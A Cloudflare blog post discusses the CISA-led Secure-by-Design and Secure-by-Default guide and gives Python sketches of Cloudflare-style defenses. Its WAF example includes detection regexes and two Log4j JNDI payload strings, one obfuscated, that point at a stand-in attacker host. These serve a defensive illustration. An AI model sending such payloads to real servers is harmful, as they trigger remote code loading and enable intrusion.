Post Syndicated from Patrick R. Donahue original https://blog.cloudflare.com/secure-by-default-understanding-new-cisa-guide/

When you buy a new house, you shouldn’t have to worry that everyone in the city can unlock your front door with a universal key before you change the lock. You also shouldn’t have to walk around the house with a screwdriver and tighten the window locks and back door so that intruders can’t pry them open. And you really shouldn’t have to take your alarm system offline every few months to apply critical software updates that the alarm vendor could have fixed with better software practices before they installed it.

Similarly, you shouldn’t have to worry that when you buy a network discovery tool it can be accessed by any attacker until you change the password, or that your expensive hardware-based firewalls can be recruited to launch DDoS attacks or run arbitrary code without the need to authenticate.

This “default secure” posture is the focus of a recently published guide jointly authored by the Cybersecurity and Infrastructure Security Agency (CISA), NSA, FBI, and six other international agencies representing the United Kingdom, Australia, Canada, Germany, the Netherlands, and New Zealand. In the guide, the authors implore technology vendors to follow Secure-by-Design and Secure-by-Default principles, shifting the burden of security as much as possible away from the end user and back towards the manufacturer:

The authoring agencies strongly encourage every technology manufacturer to build their products in a way that prevents customers from having to constantly perform monitoring, routine updates, and damage control on their systems to mitigate cyber intrusions. Manufacturers are encouraged to take ownership of improving the security outcomes of their customers. Historically, technology manufacturers have relied on fixing vulnerabilities found after the customers have deployed the products, requiring the customers to apply those patches at their own expense. Only by incorporating Secure-by-Design practices will we break the vicious cycle of creating and applying fixes.

In this post we’ll review some of the authors’ recommendations, discuss how Cloudflare applies these principles to the products that we build, and provide some suggestions on what other organizations can do to support similar initiatives internally.

Secure-by-Default: building products that require minimal hardening

Cloudflare makes cybersecurity products that protect employees, applications, and networks from attack. Typically, the ideas for new products and features come from one of two places: i) customers who are expressing a risk they’re worried about; or ii) our own internal Security team asking for help better securing Cloudflare’s internal network from threats. (The products that we build for our Security team are also then made available to our customers, once they’re battle-tested internally.)

Whatever the source, when a product manager thinks through a new product offering, they first socialize the idea around the company for feedback. Often this feedback includes encouragement to make the product more “magical”. In practice, this means customers should have to do less but get more; our job is essentially to make security administrators’ lives easier so they can focus their time where it’s most needed. An early example of this approach can be found in our blog post announcing Universal SSL in 2014:

For all customers, we will now automatically provision a SSL certificate on CloudFlare’s network that will accept HTTPS connections for a customer’s domain and subdomains.

The idea sounds simple, but in 2014 this approach to SSL/TLS was unique in the industry: every other platform required customers to take some action before their website was encrypted in transit using HTTPS to protect against snooping and impersonation. Security administrators either had to acquire the certificate themselves and upload (and renew) it, or manually perform steps to demonstrate ownership to a certificate authority (CA). Because Cloudflare both manages authoritative DNS for our customers and runs a global reverse proxy, we can take care of all these steps automagically. Additionally, as new SSL/TLS attacks are discovered, we automatically improve how our servers negotiate encryption with browsers and API clients to keep our customers secure. No customer configuration or oversight is required.
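To make the shift in burden concrete, here is a minimal sketch of one chore a provider absorbs when it manages certificates on the customer’s behalf: deciding which certificates are due for renewal. The `Certificate` type, the `certificates_to_renew` function, and the 30-day window are hypothetical illustrations, not a description of how Cloudflare actually schedules renewals.

```python
from dataclasses import dataclass
from datetime import datetime, timedelta, timezone

# Hypothetical renewal window; a real provider picks its own policy.
RENEWAL_WINDOW = timedelta(days=30)


@dataclass
class Certificate:
    hostname: str
    not_after: datetime  # expiry timestamp (timezone-aware, UTC)


def certificates_to_renew(certs, now, window=RENEWAL_WINDOW):
    """Return hostnames whose certificates expire within `window` of `now`.

    Expired certificates are included too. The provider runs this on its own
    schedule, so the customer never tracks expiry dates or uploads replacements.
    """
    return [c.hostname for c in certs if c.not_after - now <= window]


if __name__ == "__main__":
    now = datetime(2023, 5, 1, tzinfo=timezone.utc)
    fleet = [
        Certificate("example.com", now + timedelta(days=10)),
        Certificate("shop.example.com", now + timedelta(days=80)),
        Certificate("old.example.com", now - timedelta(days=1)),  # already expired
    ]
    print(certificates_to_renew(fleet, now))
```

The point of the design is where the loop runs: on infrastructure the provider controls, rather than as a calendar reminder for every customer’s administrator.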

We agree with CISA’s statement that “[t]he complexity of security configuration should not be a customer problem,” and we aim to build products that materially improve security with little to no customer action beyond putting their employees, applications, and networks behind Cloudflare:

Secure-by-Default products are those that are secure to use “out of the box” with little to no configuration changes necessary and security features available without additional cost. Together, these two principles move much of the burden of staying secure to manufacturers and reduce the chances that customers will fall victim to security incidents resulting from misconfigurations, insufficiently fast patching, or many other common issues.



Another example of our Secure-by-Default approach is how we protect against “0 day” attacks in our Web Application Firewall using machine learning (ML). Zero-day attacks exploit security vulnerabilities that are discovered by attackers or researchers before the software vendor is aware of the issue (or has had a chance to release a patch). Often the vulnerability is exploited “in the wild” before customers are able to plug the holes in their systems, or before their upstream security vendors are able to virtually patch the issue. A recent, widely exploited 0 day was the vulnerability in Log4j; software manufacturers using this library in their code raced to update their software as quickly as possible, but many took days, weeks, or even months to do so.



Cloudflare is proud of the speed at which we responded to Log4j, and of the fact that we provide the highest-severity WAF protections to all plans, including Free, but it’s always a race against the clock. We created the ML-computed WAF Attack Score to give our customers a more Secure-by-Default system that doesn’t rely on new rules being rushed out or on reactive configuration changes. Most WAFs work by matching properties of an incoming HTTP request against a set of “signatures”, which are essentially patterns described using regular expressions. We do that too, but we also train ML models on the “true positive” matches, which allows us to infer the likelihood that a new request is malicious even when it doesn’t match a signature. Customers can write one rule up front that blocks high-confidence malicious requests, and they’re protected against 0 days thereafter. Secure by default, even against attacks that have not yet been discovered.
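The contrast between signature matching and a single score-based rule can be sketched in a few lines of Python. This is a toy model under stated assumptions: the two regexes, the `attack_score` field, its scale of 1 to 99 (lower meaning more likely malicious), and the threshold of 20 are all hypothetical, and the score is passed in as an input rather than computed by a real model.

```python
import re
from dataclasses import dataclass, field

# Hypothetical signatures: regular expressions describing known attack patterns.
SIGNATURES = {
    "sqli_union_select": re.compile(r"union\s+select", re.IGNORECASE),
    "log4j_jndi_lookup": re.compile(r"\$\{jndi:", re.IGNORECASE),
}


@dataclass
class Request:
    path: str
    headers: dict = field(default_factory=dict)
    # Hypothetical ML output: 1 (very likely malicious) to 99 (very likely clean).
    attack_score: int = 99


def matched_signatures(req):
    """Names of every signature that matches the path or any header value."""
    fields = [req.path, *req.headers.values()]
    return [name for name, rx in SIGNATURES.items()
            if any(rx.search(value) for value in fields)]


def should_block(req, score_threshold=20):
    """Block on any signature match, or on a low attack score.

    The score check stands in for the one rule a customer writes up front;
    it does not need editing when a new attack variant appears.
    """
    return bool(matched_signatures(req)) or req.attack_score < score_threshold


if __name__ == "__main__":
    known = Request("/", {"User-Agent": "${jndi:ldap://attacker.example/a}"}, attack_score=3)
    # Obfuscated variant: slips past the regex, but the (hypothetical) model scores it low.
    obfuscated = Request("/", {"User-Agent": "${${lower:j}ndi:ldap://attacker.example/a}"}, attack_score=5)
    benign = Request("/search?q=union+station", attack_score=92)
    for name, req in [("known", known), ("obfuscated", obfuscated), ("benign", benign)]:
        print(name, matched_signatures(req), should_block(req))
```

In this sketch the obfuscated request matches no signature, so only the score rule catches it; that gap is what a learned score is meant to cover.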





One final example of this approach can be found in how we designed Cloudflare One, the zero trust suite we initially built to protect Cloudflare’s own employees and networks. When we opened Cloudflare One to businesses of all sizes, we wanted a secure-by-default way to connect and protect corporate networks that didn’t require poking a bunch of holes in network firewalls.

Instead of this traditional route, which requires security administrators to make upfront changes and then guard against firewall configuration drift over time, we designed Cloudflare Tunnel to establish mutually authenticated, encrypted connections directly to Cloudflare’s edge. Additionally, we wanted to shut off access to our customers’ networks completely by default, permitting access only to specific applications by strongly authenticated users, rather than through IP and port holes that aren’t tied to a known identity.
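The difference between default-deny, identity-aware access and open IP/port holes can be sketched as a single policy check. This is a minimal illustration, not how Cloudflare Tunnel or Cloudflare One actually evaluate policies: the `Identity` type, the `mfa_verified` flag, the application hostnames, and the group names are all hypothetical.

```python
from dataclasses import dataclass
from typing import Optional


@dataclass(frozen=True)
class Identity:
    email: str
    groups: frozenset
    mfa_verified: bool  # hypothetical flag: did the user complete strong authentication?


# Hypothetical allow-list: each application names the groups allowed to reach it.
# Anything not listed here is unreachable, whatever its IP address or port.
APP_POLICIES = {
    "wiki.internal.example": frozenset({"employees"}),
    "billing.internal.example": frozenset({"finance"}),
}


def is_allowed(identity: Optional[Identity], app: str) -> bool:
    """Default deny: allow only a listed app, a strongly authenticated user,
    and membership in one of the app's permitted groups."""
    allowed_groups = APP_POLICIES.get(app)
    if allowed_groups is None:
        return False  # unknown application: no implicit network-level access
    if identity is None or not identity.mfa_verified:
        return False  # anonymous or weakly authenticated request
    return bool(identity.groups & allowed_groups)


if __name__ == "__main__":
    alice = Identity("alice@example.com", frozenset({"employees"}), mfa_verified=True)
    print(is_allowed(alice, "wiki.internal.example"))     # listed app, matching group
    print(is_allowed(alice, "billing.internal.example"))  # listed app, wrong group
    print(is_allowed(alice, "10.0.0.5:22"))               # raw IP/port is never listed
    print(is_allowed(None, "wiki.internal.example"))      # anonymous request
```

Every branch that is not an explicit match returns `False`, so forgetting to write a rule leaves a resource closed rather than open.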

Secure-by-Design: continual (re)investment in secure development practices

Secure defaults that require minimal customer intervention are critically important, but not sufficient on their own to protect our customers. How engineering builds the products, and how our CSO organization evaluates them for adherence to secure development practices, is just as important in minimizing vulnerabilities that could lead to customer compromise. And none of that matters without support from executive leadership for significant investments that may not immediately result in visible customer benefit.





Cloudflare’s engineering team builds products using the most secure development practices and tools available at the time of implementation that meet the product’s requirements and architectural constraints. The options available evolve over time, of course, so what was most appropriate (and secure) in 2013, when we wrote the initial version of the Cloudflare WAF, may no longer be the best option in 2023. Lua made sense for us at the time, for reasons outlined in a separate talk, but when the WAF started to show its age in 2017 we had a choice: continue bolting on features quickly to try to close the gap with competitive products, or invest in a memory-safe language that would improve security and performance at the cost of near-term momentum.





We knew that if we designed our underlying WAF platform correctly, customers at scale could more easily adopt other Application Security products such as Bot Management and our new API Gateway. Our existing core WAF functionality would also benefit from new evaluation engines, running 40% faster and becoming more resilient. But proposing a complete rewrite, in Rust (a relatively nascent language at the time), of a system that processed millions of requests per second was no small undertaking or ask. Fortunately, we had the full support of Cloudflare’s executive and technical leadership teams to make this investment, which, as CISA et al. write, is critical for security (emphasis added):

Secure-by-Design development requires the investment of significant resources by software manufacturers at each layer of the product design and development process that cannot be “bolted on” later. It requires strong leadership by the manufacturer’s top business executives to make security a business priority, not just a technical feature.

[and]

Manufacturers are encouraged to make hard tradeoffs and investments, including those that will be “invisible” to the customers, such as migrating to programming languages that eliminate widespread vulnerabilities. They should prioritize features, mechanisms, and implementation of tools that protect customers rather than product features that seem appealing but enlarge the attack surface.

The end result of our efforts was a new WAF rule evaluation engine written entirely in Rust, a performant, memory-safe language that rules out buffer overflows in safe code. The rewrite has positioned us well for the future. After it, our Cache team embarked on a similarly XL-sized project: replacing NGINX with Pingora, a Rust-based reverse proxy engine. These projects were costly, but they improved the security posture of our customers:

The authoring agencies acknowledge that taking ownership of the security outcomes for customers and ensuring this level of customer security may increase development costs.

However, investing in “Secure-by-Design” practices while developing new technology products and maintaining existing ones can substantially improve the security posture of customers and reduce the likelihood of being compromised.

Secure-by-Default and Secure-by-Design: implementing these principles into your organization

Building secure products that are easy to adopt and require minimal ongoing customer oversight is paramount in today’s threat environment, but it takes an aligned organization to deliver. Below are some techniques that Cloudflare employs to solve our customers’ security problems, and shift the operational burden away from their network towards ours:

1. Perform as much logic as you can in code you control and can update without user intervention

Like many readers, I’m the technical support person for my parents. Their home networking equipment is quite modern and sends me alerts when there are critical security updates, but I’m always afraid that if I apply updates without being onsite, something might go wrong.

Professional security administrators face the same problem when dealing with enterprise networking equipment. When software gets shipped into heterogeneous customer environments, things can go wrong. Having a single software stack that runs on every server in our fleet has made it immeasurably easier to stay on top of software updates for our customers.

The more your organization can shift the operational burden away from your customers and onto your own infrastructure, the easier it will be for people to adopt your products and keep them secure. Relying on overburdened administrators to apply patches, especially if there’s risk of downtime, is a difficult proposition.

2. Educate executive leadership on the importance of continual reinvestment in modern security standards, and run experiments to build credibility

Today’s economic environment is challenging: customers are being forced to do more with less, while the software providers they depend upon are no longer hiring at the rate they once were. How to prioritize scarce engineering resources across new features, technical debt, and security hardening is not obvious, and is likely to draw differing opinions internally. Laying out clear business cases for adopting secure-by-default and secure-by-design mindsets is therefore even more critical for security improvements that lack an obvious customer-visible benefit.

Projects should also be appropriately scoped, and experiments should be run early and often. Do not wait until you are nearly through a project before letting others play with and review your proof-of-concepts and code. You may find support within the organization where you did not expect it, accelerating projects and increasing the likelihood that they succeed. You’ll also be able to demonstrate unexpected benefits that customers will embrace, helping build a base of support for the sustained effort.

3. Empower your security practitioners to provide feedback early and often in the development cycle

The skill set required to code new products and features does not perfectly overlap with the skill set required to spot security risks in them. Application security experts are helpful because they can quickly pattern match security “code smells” with other projects they’ve previously reviewed and helped harden.

You should embed your security experts within your product engineering teams so that they can provide guidance at the earliest (and lowest cost) phase of development. Having these experts review your functional specifications may save development cycles downstream.

4. Incentivize products that do more for customers “automagically”

People respond to incentives. If your business is built on selling professional services to enterprise customers, there is little incentive for your software developers to minimize the effort required during the installation, tuning, and hardening process.

If your products are designed to be consumed by hundreds of thousands of customers of all sizes, you have no choice but to do more for customers out-of-the-box. Otherwise, your support organization will be overwhelmed and your customers will be vulnerable.

5. Avoid default passwords at all costs



Every day, Cloudflare mitigates DDoS attacks launched by botnets made up of insecure-by-default devices. Manufacturers ship IoT devices and home networking equipment with default or easy-to-guess passwords, and many proxy vendors require no authentication out of the box.

If these manufacturers followed the principles outlined in the CISA guide, these attacks would decrease in both intensity and frequency, as fewer and fewer devices could be recruited for attack amplification.
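For device makers, the alternative to a shared factory password can be small. Below is a minimal Python sketch, assuming a hypothetical first-boot flow: each unit gets a random one-time setup secret at manufacture time (printed on its label, say), and setup refuses to finish until the owner picks a password that passes a few checks. The function names, the deny-list, and the 12-character minimum are illustrative assumptions.

```python
import secrets

# Hypothetical deny-list; a real product would check a much larger corpus
# of common and breached passwords.
COMMON_PASSWORDS = {"admin", "password", "123456", "12345678", "root", "default"}

MIN_LENGTH = 12  # hypothetical policy


def provision_initial_secret():
    """Generate a unique, random setup secret per device at manufacture time,
    instead of shipping every unit with the same factory password."""
    return secrets.token_urlsafe(16)


def validate_new_password(candidate, device_secret):
    """Return a list of problems; an empty list means the password is acceptable."""
    problems = []
    if len(candidate) < MIN_LENGTH:
        problems.append(f"must be at least {MIN_LENGTH} characters")
    if candidate.lower() in COMMON_PASSWORDS:
        problems.append("is a common default password")
    # Constant-time comparison, so the check itself doesn't leak the secret via timing.
    if secrets.compare_digest(candidate.encode(), device_secret.encode()):
        problems.append("must differ from the one-time setup secret")
    return problems
```

A device following this pattern would keep remote management disabled until `validate_new_password` returns an empty list, so no unit ever sits on the network with a guessable credential.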